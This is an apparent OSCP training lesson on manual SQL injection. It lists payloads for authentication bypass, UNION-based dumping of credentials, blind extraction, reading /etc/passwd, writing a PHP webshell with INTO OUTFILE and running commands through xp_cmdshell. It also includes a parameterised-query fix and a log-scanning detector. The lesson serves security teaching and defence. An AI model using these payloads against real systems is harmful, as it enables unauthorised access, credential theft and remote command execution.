Web Application Attacks

SQL Injection Attacks


SQL injection (SQLi) remains one of the most critical web vulnerabilities. This lesson covers manual testing techniques essential for OSCP.

Understanding SQL Injection

SQL injection occurs when user input is directly inserted into database queries:

// Vulnerable code
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";

With the username input admin' OR '1'='1 and an empty password, the query becomes:

SELECT * FROM users WHERE username='admin' OR '1'='1' AND password=''
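The same defect and its fix, as an added example that is not part of the original lesson: the spliced-string query from the PHP snippet above is rebuilt in Python against an in-memory SQLite table (constructed for the demo), next to the parameterised version that treats the payload as plain data. The table contents, the admin user and the function names are my own assumptions.

```python
import sqlite3

# Constructed in-memory user table for the demonstration (not a real application).
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def rendered_query(username: str, password: str) -> str:
    # Same pattern as the PHP snippet above: the input is spliced into the
    # SQL text, so quote characters in the input become part of the syntax.
    return (
        f"SELECT * FROM users WHERE username='{username}' "
        f"AND password='{password}'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Executes the spliced query; returns True when any row matches.
    return conn.execute(rendered_query(username, password)).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: the SQL text is fixed and the driver binds the
    # values separately, so "admin' OR '1'='1" is compared as a literal
    # username and never alters the WHERE clause.
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    conn = build_db()
    payload = "admin' OR '1'='1"
    print(rendered_query(payload, ""))
    print("vulnerable login bypassed:", login_vulnerable(conn, payload, ""))
    print("parameterised login bypassed:", login_safe(conn, payload, ""))
```

Run it and the vulnerable path logs the admin in with an empty password because the OR clause rewrites the WHERE condition; the parameterised path fails for the same input because the quote never reaches the SQL parser. The admin'-- variant from the bypass section below behaves the same way: the comment truncates the vulnerable query but is just a strange username to the safe one.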

Identifying SQL Injection

Testing for SQLi

Common test payloads:
'              (single quote)
"              (double quote)
' OR '1'='1    (always true)
' OR '1'='1'-- (comment out rest)
1' ORDER BY 1--
admin'--

Error-Based Detection

Look for database errors:

MySQL:    "You have an error in your SQL syntax"
MSSQL:    "Unclosed quotation mark"
PostgreSQL: "syntax error at or near"
Oracle:   "ORA-01756: quoted string not properly terminated"
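From the defender's side, the probe payloads and error strings listed above are exactly what a log review should catch. The following is an added example, not part of the original lesson: it decodes query strings from combined-format access log lines, tags parameter values that match the probe patterns (tautologies, ORDER BY and UNION SELECT probes, delay functions, comment terminators) and maps database error text leaked into an application log back to the DBMS. The pattern names, the log lines and the log formats are constructed for the demo.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Signatures derived from the probe payloads and error strings listed above.
# The pattern names are my own labels, not an established taxonomy.
PAYLOAD_PATTERNS = [
    ("tautology", re.compile(r"""['"]\)?\s*(or|and)\s+\(?['"]?\w+['"]?\s*=\s*['"]?\w+""", re.I)),
    ("order_by_probe", re.compile(r"""['"]\s*order\s+by\s+\d+""", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("time_delay", re.compile(r"\b(sleep|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("comment_terminator", re.compile(r"(--|#)\s*$|/\*")),
]

DB_ERROR_SIGNATURES = {
    "MySQL": "You have an error in your SQL syntax",
    "MSSQL": "Unclosed quotation mark",
    "PostgreSQL": "syntax error at or near",
    "Oracle": "ORA-01756",
}

# Combined log format: ip ident user [time] "METHOD target PROTO" status size
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_value(value: str) -> list:
    """Return the names of every payload pattern found in one parameter value."""
    return [name for name, rx in PAYLOAD_PATTERNS if rx.search(value)]


def scan_access_log(lines: list) -> list:
    """Decode each request's query string and flag parameter values that look
    like the injection probes above. Returns one record per flagged value."""
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        url = urlsplit(m["target"])
        for param, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:  # parse_qs already URL-decodes the value
                tags = classify_value(value)
                if tags:
                    hits.append({"ip": m["ip"], "path": url.path, "param": param,
                                 "value": value, "tags": tags, "status": int(m["status"])})
    return hits


def fingerprint_db_error(text: str) -> Optional[str]:
    """Map an error message found in an application log to the DBMS that
    produced it; any non-None result means raw DB errors are being exposed."""
    for dbms, signature in DB_ERROR_SIGNATURES.items():
        if signature in text:
            return dbms
    return None


# Constructed sample log lines (not from any real system).
ACCESS_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /login?username=admin&password=s3cret HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /login?username=admin%27+OR+%271%27%3D%271--&password=x HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /item?id=1%27+ORDER+BY+3-- HTTP/1.1" 500 88',
    '10.0.0.9 - - [10/Oct/2023:13:55:43 +0000] "GET /item?id=1%27+UNION+SELECT+NULL%2CNULL-- HTTP/1.1" 200 1400',
    '10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=O%27Reilly HTTP/1.1" 200 700',
]
APP_LOG = [
    "2023-10-10T13:55:41Z ERROR /item id=1' ORDER BY 3-- : You have an error in your SQL syntax",
    "2023-10-10T13:56:01Z INFO /search q=O'Reilly : 3 results",
]

if __name__ == "__main__":
    for hit in scan_access_log(ACCESS_LOG):
        print(hit["ip"], hit["path"], hit["param"], hit["status"], hit["tags"])
    for line in APP_LOG:
        print(fingerprint_db_error(line), "<-", line)
```

The legitimate apostrophe in O'Reilly is not flagged because the patterns key on the SQL structure around the quote (a boolean operator, ORDER BY, a trailing comment) rather than on the quote alone; that is the difference between a probe signature and a noisy single-character match. A 500 status on the ORDER BY probe together with a MySQL fingerprint from the application log is the combination to alert on: the input is being reached by the parser and the error text is making it back to the client.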

Manual SQL Injection Techniques

Authentication Bypass

-- Basic bypass
Username: admin' OR '1'='1'--
Password: anything

-- Alternative payloads
admin'--
' OR 1=1--
' OR 'a'='a
') OR ('1'='1

Union-Based Injection

Step 1: Find number of columns

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--  -- Continue until error

-- Or use NULL
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

Step 2: Find displayable columns

' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
' UNION SELECT NULL,NULL,'a'--

Step 3: Extract data

-- MySQL
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password FROM users--

-- MSSQL
' UNION SELECT name,NULL FROM sysobjects WHERE xtype='U'--
' UNION SELECT name,NULL FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='users')--

Extracting Database Information

MySQL:

-- Database version
' UNION SELECT @@version,NULL--

-- Current database
' UNION SELECT database(),NULL--

-- Current user
' UNION SELECT user(),NULL--

-- List databases
' UNION SELECT schema_name,NULL FROM information_schema.schemata--

MSSQL:

-- Database version
' UNION SELECT @@version,NULL--

-- Current database
' UNION SELECT db_name(),NULL--

-- List databases
' UNION SELECT name,NULL FROM master..sysdatabases--

Blind SQL Injection

When no output is visible, use time-based or boolean-based techniques.

Boolean-Based

-- Test if injectable
' AND 1=1--  (should return the normal page)
' AND 1=2--  (should return a different page or no result)

-- Extract data character by character
' AND SUBSTRING(username,1,1)='a'--
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--

Time-Based

-- MySQL
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--

-- MSSQL
'; WAITFOR DELAY '0:0:5'--

-- PostgreSQL
'; SELECT pg_sleep(5)--

Reading Files (MySQL)

-- Read /etc/passwd
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL--

-- Read web files
' UNION SELECT LOAD_FILE('/var/www/html/config.php'),NULL--

Writing Files (MySQL)

-- Write webshell (requires FILE privilege)
' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'--

SQL Injection Cheat Sheet

MySQL

-- Comments
--
#
/* */

-- String concatenation
'admin' 'istrator'  -- implicit
CONCAT('a','b')

-- Version
@@version
VERSION()

-- Current database
database()

-- List tables
SELECT table_name FROM information_schema.tables WHERE table_schema=database()

-- List columns
SELECT column_name FROM information_schema.columns WHERE table_name='users'

MSSQL

-- Comments
--
/* */

-- String concatenation
'a'+'b'

-- Version
@@version

-- Current database
db_name()

-- Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Execute commands
EXEC xp_cmdshell 'whoami';

OSCP SQLi Guidelines

Remember: sqlmap's --os-shell is prohibited in OSCP. Manual injection is required.

Allowed:

  • Manual SQL injection
  • Burp Suite (manual mode)
  • Custom scripts

Not Allowed:

  • sqlmap automated exploitation
  • Auto-exploitation features

SQLi Testing Workflow

1. Identify input points
   └── Forms, URLs, cookies, headers

2. Test for injection
   └── Single quotes, errors

3. Determine database type
   └── Error messages, syntax differences

4. Enumerate structure
   └── Tables, columns

5. Extract data
   └── Credentials, sensitive info

6. Escalate if possible
   └── File read/write, command execution

Next, we'll cover command injection and OS command execution vulnerabilities.